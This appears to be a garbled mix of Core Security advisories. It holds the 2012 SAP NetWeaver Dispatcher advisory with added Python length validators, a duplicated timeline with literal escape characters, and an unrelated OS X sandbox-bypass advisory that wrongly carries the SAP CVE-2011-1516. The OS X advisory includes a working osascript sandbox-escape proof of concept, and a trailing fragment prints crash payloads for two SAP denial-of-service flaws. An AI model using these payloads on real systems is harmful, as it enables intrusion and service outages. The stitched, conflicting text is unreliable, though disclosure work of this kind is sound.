Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
Vulnerability Information
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. Multiple vulnerabilities have been found in
SAP Netweaver that could allow an unauthenticated, remote attacker to
execute arbitrary code or cause denial of service conditions. The
vulnerabilities are triggered by sending specially crafted SAP Diag packets
to remote TCP port 32NN (where NN is the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. Each vulnerability is triggered by a different Diag message.
Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
Non-vulnerable packages
. Vendor did not provide this information.
Vendor Information, Solutions and Workarounds
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
Credits
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories.
Technical Description / Proof of Concept Code
NOTE: The 'Dialog processing' trace level must be set to 2 or 3 for
the flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512] to be triggered.
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when the SAP Netweaver
'disp+work.exe' module processes a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
8.2. SAP Netweaver DiagTraceHex Denial of Service Vulnerability
[CVE-2011-1517] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceHex' in the 'disp+work.exe' module. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
8.3. SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability
[CVE-2012-2511] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceAtoms'. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
8.4. SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability
[CVE-2012-2512] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceStreamI' and could allow a remote unauthenticated attacker to
conduct a denial of service attack.
8.5. SAP Netweaver Diaginput Denial of Service Vulnerability
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable
function 'Diaginput', allowing a denial of service attack against the
vulnerable systems.
8.6. SAP Netweaver DiagiEventSource Denial of Service Vulnerability
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable
function 'DiagiEventSource' in the 'disp+work.exe' module. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
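All six flaws above are reached through the contents of individual Diag items, so the check a defender most wants is that every length an item declares is bounded by the bytes the frame actually carries. The following Python 3 validator is an added example, not part of the advisory and not Core Security's proof-of-concept script. It assumes, from public descriptions of the SAP Diag protocol rather than from this advisory, that a frame consists of a 4-byte big-endian NI length prefix, an 8-byte Diag header and a list of items in which type 0x10 (APPL) carries id, sid and a 2-byte length, type 0x12 (APPL4) carries id, sid and a 4-byte length, and type 0x0c marks end of message. The function names (`parse_ni_frame`, `parse_diag_items`, `validate_frame`) and the two sample frames are constructed here.

```python
import struct

# Assumed SAP Diag framing (from public protocol descriptions, not from the
# advisory): a 4-byte big-endian NI length prefix, an 8-byte Diag header and
# then a list of items. Only the item types needed for the check are modelled.
ITEM_EOM = 0x0c    # end of message, no body
ITEM_APPL = 0x10   # id, sid, 2-byte big-endian length, value
ITEM_APPL4 = 0x12  # id, sid, 4-byte big-endian length, value

NI_HEADER_LEN = 4
DIAG_HEADER_LEN = 8


class DiagParseError(ValueError):
    """Raised for any frame whose declared lengths disagree with its bytes."""


def parse_ni_frame(data):
    """Strip the NI length prefix, insisting that it matches the payload size."""
    if len(data) < NI_HEADER_LEN:
        raise DiagParseError("truncated NI header (%d bytes)" % len(data))
    (declared,) = struct.unpack("!I", data[:NI_HEADER_LEN])
    payload = data[NI_HEADER_LEN:]
    if declared != len(payload):
        raise DiagParseError("NI length %d does not match payload of %d bytes"
                             % (declared, len(payload)))
    return payload


def parse_diag_items(payload):
    """Walk the items after the Diag header, checking every declared length
    against the bytes that remain.  Returns a list of (type, id, sid, value)."""
    if len(payload) < DIAG_HEADER_LEN:
        raise DiagParseError("truncated Diag header (%d bytes)" % len(payload))
    pos = DIAG_HEADER_LEN
    items = []
    while pos < len(payload):
        item_type = payload[pos]
        pos += 1
        if item_type == ITEM_EOM:
            return items
        if item_type == ITEM_APPL:
            header_fmt, header_len = "!BBH", 4
        elif item_type == ITEM_APPL4:
            header_fmt, header_len = "!BBI", 6
        else:
            raise DiagParseError("unsupported item type 0x%02x at offset %d"
                                 % (item_type, pos - 1))
        if pos + header_len > len(payload):
            raise DiagParseError("truncated item header at offset %d" % pos)
        item_id, item_sid, length = struct.unpack(
            header_fmt, payload[pos:pos + header_len])
        pos += header_len
        remaining = len(payload) - pos
        # The item's own length field is attacker-controlled and must never be
        # trusted beyond the bytes actually present in the frame.
        if length > remaining:
            raise DiagParseError(
                "item 0x%02x/0x%02x declares %d bytes but only %d remain"
                % (item_id, item_sid, length, remaining))
        items.append((item_type, item_id, item_sid, payload[pos:pos + length]))
        pos += length
    raise DiagParseError("message ended without an EOM item")


def validate_frame(data):
    """Return (True, items) for a well-formed frame, else (False, reason)."""
    try:
        return True, parse_diag_items(parse_ni_frame(data))
    except DiagParseError as exc:
        return False, str(exc)


# Constructed sample frames (not captured traffic).
# A well-formed message: Diag header, one APPL item (id 4, sid 0x26 with a
# 4-byte value) and the EOM marker; payload is 8 + 9 + 1 = 18 bytes.
GOOD_FRAME = (struct.pack("!I", 18) + b"\x00" * 8
              + b"\x10\x04\x26\x00\x04\x00\x00\x00\x01" + b"\x0c")
# A malformed message: an APPL4 item whose 4-byte length field claims
# 0x7fffffff bytes while only six follow it; payload is 8 + 7 + 6 + 1 = 22.
BAD_FRAME = (struct.pack("!I", 22) + b"\x00" * 8
             + b"\x12\x04\x18\x7f\xff\xff\xff" + b"x" * 6 + b"\x0c")

if __name__ == "__main__":
    for name, frame in (("good", GOOD_FRAME), ("bad", BAD_FRAME)):
        ok, result = validate_frame(frame)
        print("%s frame: %s -> %s"
              % (name, "accepted" if ok else "rejected", result))
```

Run as a script it accepts the first sample and rejects the second with the offending item's id, sid and declared length, which is the detail worth logging when such a validator sits in front of a test system or in a fuzzing harness. The first frame of a Diag session carries an additional DP header before the Diag header and is deliberately outside the scope of this validator.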
Report Timeline
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
. 2012-01-24:
Core sends an advisory draft with technical details.
. 2012-01-24:
The SAP team confirms receipt of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies Core of its
terms and conditions [3], and asks Core to commit to those guidelines.
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
. 2012-02-21:
First release date missed.
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
. 2012-05-07:
Core asks again for the status of the fix.
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
. 2012-05-08:
Advisory CORE-2012-0123 published.
References
[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
2012-04-16: \nCore asks if the patching process is still on track to release patches \non May 8th and requests a status of the fix. \n \n. 2012-04-16: \nVendor notifies that the release date is still planned for May 8th, but \ndue to quality control processes this date cannot be guaranteed. \n \n. 2012-05-04: \nCore notifies that everything is ready for publication and requests the \nvendor to confirm the release date and the list of affected platforms \n(no reply received). \n \n. 2012-05-07: \nCore asks again for the status of the fix. \n \n. 2012-05-08: \nSAP notifies that they have released the security note 1687910 [4] on \nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP \nalso requests Core to remove all the technical information researched by \nMartin Gallo in [Sec. 8]. \n \n. 2012-05-08: \nCore replies that the reporting of vulnerabilities is aimed at helping \nvulnerable users to understand and address the issues; the advisory will \nthus be released with the technical information. \n \n. 2012-05-08: \nAdvisory CORE-2012-0123 published. \n \n \n \n10. *References* \n \n[1] http://www.sap.com/platform/netweaver/index.epx \n[2] \nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm \n[3] SAP's legal information, terms and conditions \nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n \n[4] SAP security note 1687910 \nhttps://service.sap.com/sap/support/notes/1687910. \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. 
\nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2012 Core Security \nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
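
Worked example (added here; it is not part of the original advisory and
not Core Security's PoC). The reproduction script in section 8 and the
six triggers in sections 8.1 to 8.6 all use the same framing: a 4-byte
big-endian NI length prefix, an 8-byte Diag header, then a list of items,
each carrying a type byte, an id byte, a sub-id byte and a length field
(16-bit for type 0x10 items, 32-bit for type 0x12 items), closed by a
single 0x0c byte. That layout, and the names ITEM_APPL, ITEM_APPL4 and
ITEM_EOM used for it, are inferred from the PoC bytes and are an
assumption, not taken from SAP documentation. The Python 3 code below
encodes items the way the PoC does, parses a captured stream back while
checking every length field against the bytes actually present (the
check that the 8.2 and 8.4 messages violate with their 0xffffffff and
0x00ff lengths), and matches the (type, id, sid) triples of the six
trigger items. The sample messages are constructed from the PoC snippets.

```python
import struct
from typing import List, NamedTuple

# Layout inferred from the PoC bytes (assumption, not SAP documentation):
#   NI layer : 4-byte big-endian length, then the Diag payload
#   Diag     : 8-byte header, then items, closed by a one-byte 0x0c item
#   item     : type(1) id(1) sid(1) length(2, BE) for type 0x10
#              type(1) id(1) sid(1) length(4, BE) for type 0x12
DIAG_HEADER_LEN = 8
ITEM_EOM = 0x0c
ITEM_APPL = 0x10       # 16-bit length field
ITEM_APPL4 = 0x12      # 32-bit length field

# (type, id, sid) of the six trigger items from sections 8.1 to 8.6
TRIGGERS = {
    (ITEM_APPL, 0x06, 0x20): "CVE-2011-1516 DiagTraceR3Info (code execution)",
    (ITEM_APPL4, 0x04, 0x18): "CVE-2011-1517 DiagTraceHex (DoS)",
    (ITEM_APPL4, 0x09, 0x02): "CVE-2012-2511 DiagTraceAtoms (DoS)",
    (ITEM_APPL, 0x13, 0x09): "CVE-2012-2512 DiagTraceStreamI (DoS)",
    (ITEM_APPL, 0x0c, 0x0e): "CVE-2012-2513 Diaginput (DoS)",
    (ITEM_APPL, 0x0f, 0x01): "CVE-2012-2514 DiagiEventSource (DoS)",
}


class Item(NamedTuple):
    kind: int
    item_id: int
    sid: int
    declared_len: int
    payload: bytes
    truncated: bool    # declared_len exceeded the bytes actually present


def ni_frame(body: bytes) -> bytes:
    """Prefix a Diag payload with the 4-byte NI length, as send_packet() does."""
    return struct.pack("!I", len(body)) + body


def diag_item(kind: int, item_id: int, sid: int, payload: bytes) -> bytes:
    """Encode one item with a length field that matches its payload."""
    fmt = {ITEM_APPL: "!H", ITEM_APPL4: "!I"}[kind]
    return bytes((kind, item_id, sid)) + struct.pack(fmt, len(payload)) + payload


def diag_message(item: bytes) -> bytes:
    """Wrap an item as send_message() does: header, step item, item, EOM."""
    step = diag_item(ITEM_APPL, 0x04, 0x26, b"\x00\x00\x00\x01")
    return b"\x00" * DIAG_HEADER_LEN + step + item + bytes((ITEM_EOM,))


def split_ni_frames(stream: bytes) -> List[bytes]:
    """Split a TCP byte stream into complete NI frames; an incomplete tail is dropped."""
    frames, pos = [], 0
    while pos + 4 <= len(stream):
        (n,) = struct.unpack_from("!I", stream, pos)
        if pos + 4 + n > len(stream):
            break
        frames.append(stream[pos + 4:pos + 4 + n])
        pos += 4 + n
    return frames


def parse_items(body: bytes) -> List[Item]:
    """Walk the item list, checking every length field against the bytes left."""
    items, pos = [], DIAG_HEADER_LEN
    while pos < len(body):
        kind = body[pos]
        if kind == ITEM_EOM:
            break
        if kind == ITEM_APPL:
            fmt, hdr_len = "!H", 5
        elif kind == ITEM_APPL4:
            fmt, hdr_len = "!I", 7
        else:
            break                            # unknown item type: stop, do not guess
        if pos + hdr_len > len(body):
            break                            # header itself is cut off
        item_id, sid = body[pos + 1], body[pos + 2]
        (declared,) = struct.unpack_from(fmt, body, pos + 3)
        start = pos + hdr_len
        available = len(body) - start
        truncated = declared > available     # the bound the trace functions did not enforce
        payload = body[start:start + min(declared, available)]
        items.append(Item(kind, item_id, sid, declared, payload, truncated))
        if truncated:
            break
        pos = start + declared
    return items


def findings(body: bytes) -> List[str]:
    """Report known trigger triples and any item whose length field overruns the message."""
    out = []
    for it in parse_items(body):
        key = (it.kind, it.item_id, it.sid)
        if key in TRIGGERS:
            out.append(TRIGGERS[key])
        if it.truncated:
            out.append("item %02x/%02x/%02x declares %d bytes, %d present"
                       % (it.kind, it.item_id, it.sid, it.declared_len, len(it.payload)))
    return out


if __name__ == "__main__":
    # Constructed sample: the section 8.2 message as it would appear on the wire
    sample = ni_frame(diag_message(b"\x12\x04\x18\xff\xff\xff\xffCrash!"))
    for frame in split_ni_frames(sample):
        for line in findings(frame):
            print(line)
```

A triple match on its own is weak evidence: items with these type, id
and sid values may also occur in legitimate sessions, and the 8.1, 8.3,
8.5 and 8.6 triggers carry consistent length fields, so only the triple
matches them. Treat a hit as a reason to check the 'Dialog processing'
trace level on the target and the source of the connection; treat a
length overrun as a malformed message regardless of the triple, since
that is exactly what a correct item parser in the work process must
reject before handing the payload to any trace routine.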


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Apple OS X Sandbox Predefined Profiles Bypass


1. *Advisory Information*

Title: Apple OS X Sandbox Predefined Profiles Bypass
Advisory ID: CORE-2011-0919
Advisory URL: http://www.coresecurity.com/content/apple-osx-sandbox-bypass
Date published: 2011-11-10
Date of last update: 2011-11-10
Vendors contacted: Apple
Release mode: User release


2. *Vulnerability Information*

Class: Access control failure [CWE-264]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516


3. *Vulnerability Description*

Several of the default pre-defined sandbox profiles don't properly
limit all the available mechanisms and therefore allow exercising part
of the restricted functionality. Namely, sending Apple events is
possible within the no-network sandbox (kSBXProfileNoNetwork). A
compromised application hypothetically restricted by the use of the
no-network profile may have access to network resources through the
use of Apple events to invoke the execution of other applications not
directly restricted by the sandbox.

It is worth mentioning that a similar issue was reported by Charlie
Miller in his talk at Black Hat Japan 2008 [2]. He mentioned a few
processes sandboxed by default as well as a method to circumvent the
protection. Sometime after the talk, Apple modified the mentioned
profiles by restricting the use of Apple events but did not modify the
generic profiles.


4. *Vulnerable packages*

. Apple Mac OS X 10.7.x
. Apple Mac OS X 10.6.x
. Apple Mac OS X 10.5.x


5. *Non-vulnerable packages*

. Apple Mac OS X 10.4


6. *Vendor Information, Solutions and Workarounds*

Contact the vendor for more information.


7. *Credits*

This vulnerability was discovered and researched by Anibal Sacco and
Matias Eissler from Core Security Technologies. The publication of
this advisory was coordinated by Carlos Sarraute.


8. *Technical Description / Proof of Concept Code*

The use of Apple events is possible within several of the default
profiles, such as no-network and no-internet (kSBXProfileNoNetwork,
kSBXProfileNoInternet), and others. A compromised application
hypothetically restricted by the use of the no-network profile may
have access to network resources through the use of Apple events to
invoke the execution of other applications not directly restricted by
the sandbox.

As Apple's "App Sandbox Design Guide" document points out,
applications that require sending Apple events to other arbitrary
applications are not suitable for sandboxing, because some developer
tools restrict Apple events by default while defining the sandbox. The
reason for this is that, as we show here, by dispatching Apple events
a process can escape the sandbox [1].

The method used by Charlie Miller involves dropping a script to the
disk and getting it executed by launchd via launchctl. Our approach is
technically the same without the need to drop a file. In our PoC we
used "osascript" to send the required Apple events to launchd in order
to execute the new process. As the new process is not a 'child' of the
sandboxed process, it is created without the sandbox restrictions.

An additional risk with these profiles is that they are supposed to
provide an example of how a process should be restricted in different
scenarios. If the no-network profile allows Apple-script events, this
may result in new applications using the same restriction rules,
therefore offering a false sense of security.

The following PoC illustrates this vulnerability (Python 3; the
seatbelt denial is recognised by its errno, EPERM, which is the
"Operation not permitted" error the original checked for by string):

/-----
import errno
import socket
import subprocess
import sys

if len(sys.argv) != 2:
    print("[-] Usage: sandbox-exec -n no-network python %s hostname" % sys.argv[0])
    sys.exit(1)

targetIP = sys.argv[1]
try:
    # A plain TCP connection: denied by the no-network profile
    s = socket.socket()
    s.connect((targetIP, 80))
    s.send(b'GET /\r\n\r\n')
    print(s.recv(1024).decode("latin-1"))
    print("\n\n\n[+] Sandbox escaped")

except OSError as e:
    if e.errno == errno.EPERM:
        print("[-] Blocked by seatbelt")
        print("[ ] Escaping...")
        # Apple events are not blocked: ask Terminal to start a fresh copy
        # of this script, which runs outside the sandbox
        subprocess.call(["/usr/bin/osascript", "-e",
                         'tell application "Terminal" to do script "python %s %s"'
                         % (sys.argv[0], targetIP)])
    else:
        raise
-----/


9. *Report Timeline*

. 2011-09-20:
Core Security Technologies notifies Apple Product Security of the
vulnerability, including technical details. Preliminary publication
date is set to November 7, 2011.

. 2011-09-20:
Vendor acknowledges the receipt of the information.

. 2011-10-05:
Vendor informs that it does not see any actual security implications.
The kSBXProfileNoNetwork sandbox profile does not promise that Apple
Events will be blocked in the documentation. (Specifically, all it
guarantees is "all sockets-based networking is prohibited".)

. 2011-10-13:
Core responds that the kSBXProfileNoNetwork sandbox profile should
guarantee that "all sockets-based networking is prohibited". The PoC
sent to Apple shows that through the use of Apple events (osascript is
used in the PoC just to keep it simple) an attacker could circumvent
the restriction. So, in the end, sockets-based networking is used.

. 2011-10-18:
Vendor responds that it is currently considering modifying its
documentation to explicitly point out what Core described; namely,
that the restrictions that these particular sandbox profiles provide
are limited to the process in which the sandbox is applied.

. 2011-11-10:
The advisory CORE-2011-0919 is published as user release.


10. *References*

[1] App Sandbox Design Guide -- Designing for App Sandbox
http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html

[2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008
https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of
threats with security test and measurement solutions that continuously
identify and demonstrate real-world exposures to their most critical
assets. Our customers can gain real visibility into their security
standing, real validation of their security controls, and real metrics
to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)

iEYEARECAAYFAk68OxMACgkQyNibggitWa0YWgCfYbGm9R0+YJw6CxP6TNwdhEWr
9ZMAn16nqBqNbO582D5QpejeuTEV5RAj
=HruN
-----END PGP SIGNATURE-----
*SAP Netweaver Diaginput Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\r\nfunction 'Diaginput', allowing a denial of service attack against the\r\nvulnerable systems.\r\n\r\n/-----\r\ncrash = "\\x10\\x0c\\x0e\\x00\\0a" + "A"*10\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\r\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\r\nvulnerability could allow a remote unauthenticated attacker to conduct a\r\ndenial of service attack.\r\n\r\n/-----\r\ncrash = "\\x10\\x0f\\x01\\x00\\x11" + "A"*17\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2012-01-24:\r\nCore Security Technologies notifies the SAP team of the vulnerability,\r\nsetting the estimated publication date of the advisory for February\r\n21st, 2012.\r\n\r\n. 2012-01-24:\r\nCore sends an advisory draft with technical details.\r\n\r\n. 2012-01-24:\r\nThe SAP team confirms the reception of the issue and asks to use the\r\nsecurity ID 582820-2012 for further communication. SAP also notifies its\r\nterms and conditions [3], and asks for Core to commit to that guideline.\r\n\r\n. 2012-02-01:\r\nThe Core Advisories Team communicates that it has its own guidelines for\r\nthe advisories publication process, which may conflict with SAP's\r\nguidelines. In particular, Core does not guarantee that the publication\r\nof the advisory will be postponed until a fix or patch is made available\r\nby SAP. If information about this vulnerability is partially or\r\ncompletely leaked by a third party, the advisory would be released\r\nimmediately as forced release. Despite this, the Core team commits to\r\ncomply with SAP's guidelines as much as possible.\r\n\r\n. 2012-02-21:\r\nFirst release date missed.\r\n\r\n. 
2012-02-22:\r\nCore asks for the status of the fix and notifies that the release date\r\nwas missed.\r\n\r\n. 2012-02-23:\r\nSAP notifies that, because the development team has to downport the\r\nsolutions for a huge bunch of software releases, the earliest release\r\ndate for the patches would be May 8th 2012.\r\n\r\n. 2012-02-23:\r\nCore re-schedules the advisory publication to May 8th.\r\n\r\n. 2012-04-16:\r\nCore asks if the patching process is still on track to release patches\r\non May 8th and requests a status of the fix.\r\n\r\n. 2012-04-16:\r\nVendor notifies that the release date is still planned for May 8th, but\r\ndue to quality control processes this date cannot be guaranteed.\r\n\r\n. 2012-05-04:\r\nCore notifies that everything is ready for publication and requests the\r\nvendor to confirm the release date and the list of affected platforms\r\n(no reply received).\r\n\r\n. 2012-05-07:\r\nCore asks again for the status of the fix.\r\n\r\n. 2012-05-08:\r\nSAP notifies that they have released the security note 1687910 [4] on\r\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\r\nalso requests Core to remove all the technical information researched by\r\nMartin Gallo in [Sec. 8].\r\n\r\n. 2012-05-08:\r\nCore replies that the reporting of vulnerabilities is aimed at helping\r\nvulnerable users to understand and address the issues; the advisory will\r\nthus be released with the technical information.\r\n\r\n. 2012-05-08:\r\nAdvisory CORE-2012-0123 published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2]\r\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions\r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\r\n\r\n[4] SAP security note 1687910\r\nhttps://service.sap.com/sap/support/notes/1687910.\r\n\r\n\r\n11. 
*About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, 